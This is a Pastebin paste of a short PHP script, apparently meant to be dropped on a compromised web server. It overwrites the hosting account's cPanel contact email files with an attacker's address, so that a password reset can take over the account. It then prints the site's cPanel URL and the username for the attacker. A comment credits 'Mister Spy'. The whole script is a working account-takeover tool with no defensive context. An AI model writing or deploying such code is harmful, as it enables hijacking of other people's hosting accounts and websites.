Advertisement
Guest User

Untitled

a guest
Sep 22nd, 2019
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.49 KB | None | 0 0
  1. <?php
  2.  
  3. $user = get_current_user();
  4. $site = $_SERVER['HTTP_HOST'];
  5. $ips = getenv('REMOTE_ADDR');
  6.  
  7.  
  8.  
  9. $email = $_GET['cp_mrxxx1@hidebusiness.xyz'];
  10. $wr = 'cp_mrxxx1@hidebusiness.xyz'.$email;
  11. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  12. fwrite($f, $wr);
  13. fclose($f);
  14. $f = fopen('/home/'.$user.'/.contactemail', 'w');
  15. fwrite($f, $wr);
  16. fclose($f);
  17. //$parm = $site.':2083/';
  18. echo 'http://'.$site.'/cpanel|';
  19. echo $user;
  20.  
  21. //echo ' Emil Changed By Mister Spy';
  22.  
  23. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement